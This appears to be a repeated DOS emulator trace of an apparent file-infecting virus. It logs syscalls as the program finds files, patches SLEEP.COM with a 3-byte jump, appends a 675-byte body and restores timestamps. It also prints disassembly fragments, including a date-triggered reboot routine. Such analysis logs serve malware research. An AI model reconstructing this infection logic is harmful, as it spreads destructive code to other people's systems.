2018-12-25T11:59:43.914713804Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.9210388Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.923591538Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.93358332Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.940270298Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.944214149Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.94580114Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.948465915Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.957872311Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.959663428Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.967409015Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.977779929Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.980923454Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.987803498Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.996095931Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.998396958Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.002863061Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.007852582Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.010532929Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.011939301Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.014731172Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.02563895Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.026854056Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.02922497Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.034132268Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.036582377Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.042977637Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.05002386Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.051790706Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.061576519Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.07074522Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.074702013Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.076212824Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.079452372Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.088644332Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.090665176Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.099537112Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.109412816Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.112226397Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.124184505Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.131142576Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.132911555Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.143489748Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.150001606Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.152666528Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.154950088Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.157641031Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.166422484Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.1687329Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.176456545Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.18618766Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.189991427Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.196898854Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.20349196Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.20620192Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.209089646Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.213499443Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.216484938Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.217990259Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.22008194Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.676834379Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.678662329Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.680617483Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.682047507Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.685505086Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.693348309Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.700390607Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.708115283Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.716837228Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.719308109Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.739755013Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.747976524Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.755850195Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.757933184Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.761727947Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.771544353Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.773558675Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.782599026Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.793988529Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.797259725Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.805037821Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.812709236Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.814708323Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.825971096Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.834187463Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.83738171Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.838969288Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.842603342Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.85213702Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.85385141Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.863507511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.874587108Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.877620552Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.885937974Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.893261413Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.895706709Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.907144589Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.915348721Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.918759558Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.920611024Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.92478127Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.934307592Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.935948022Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.945639025Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.956790967Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.96337435Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.972234947Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.980027766Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.982249741Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.994458434Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.002068578Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.00524724Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.007581538Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.010634898Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.019789309Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.021548664Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.030431539Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.041213513Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.04411137Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.053090878Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.060723775Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.062909681Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.072465438Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.078526166Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.082091257Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.084527224Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.08739881Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.103520308Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.10771514Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.109887109Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.115152008Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.120126956Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.128323967Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.135702535Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.141196202Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.152483523Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.160061359Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.163658183Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.166969415Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.170209832Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.180537354Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.184710196Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.191573695Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.198529359Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.201415515Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.206148858Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.210488596Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.212702095Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.219736874Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.224448169Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.226687976Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.228533474Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.230800648Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.236642163Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.238480146Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.247844996Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.254633239Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.25715322Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.261605027Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.265944644Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.268285196Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.270176732Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.273105439Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.275392766Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.276456083Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.277868235Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.833463923Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.835537636Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.837021575Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.838428484Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.841969212Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.848517565Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.85932209Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.871239495Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.877879646Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.879883022Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.895476684Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.902519987Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.905614565Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.907282026Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.914186095Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.926771137Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.928205516Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.936992366Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.946625341Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.94918505Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.958481973Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.964956771Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.966861839Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.985254711Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.991778133Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.994974302Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.997558751Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.999999605Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.008729292Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.011738528Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.019438857Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.029392327Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.032548643Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.039969338Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.046560185Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.048810767Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.059378692Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.066184656Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.069440341Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.071989025Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.074746409Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.08373235Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.086466622Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.094186411Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.103881645Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.106953191Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.113705398Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.120464855Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.124129713Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.134587992Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.146492879Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.154106384Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.15611906Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.158816676Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.16792955Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.169818571Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.177434549Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.187261891Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.191009051Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.197705586Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.204139945Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.207877848Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.212391022Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.217167416Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.220970349Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.22258042Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.225238857Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.241449022Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.242988936Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.244743721Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.249867774Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.252818876Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.259102876Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.266461821Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.268495225Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.278847408Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.286114981Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.289154991Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.290837406Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.294068653Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.303640882Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.305436229Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.31111133Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.317452437Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.319228555Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.324019327Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.329006796Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.330299408Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.338567759Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.342841042Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.347605614Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.349308689Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.351399271Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.356539373Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.358426856Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.363514408Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.370335422Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.378224511Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.382916227Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.386884025Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.388489311Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.390726474Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.396543275Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.399955577Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.40195957Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.404062461Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.994915236Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.997404281Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.99983501Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.002176813Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.005806708Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.013470164Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.020562994Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.027993457Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.035419419Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.0373295Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.057788064Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.066075824Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.073854958Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.075520039Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.078712829Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.088386817Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.089935847Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.098632087Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.109596432Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.113389787Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.119843966Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.124312882Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.125609194Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.132147687Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.137128354Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.139163104Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.140313608Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.142595939Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.149189965Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.150622354Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.160047954Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.171407926Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.174889556Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.183801021Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.19101953Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.193070666Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.204951272Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.212373894Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.215844455Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.218265574Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.221396776Z 64 PC: 12cf9 | Write file or device (See above)
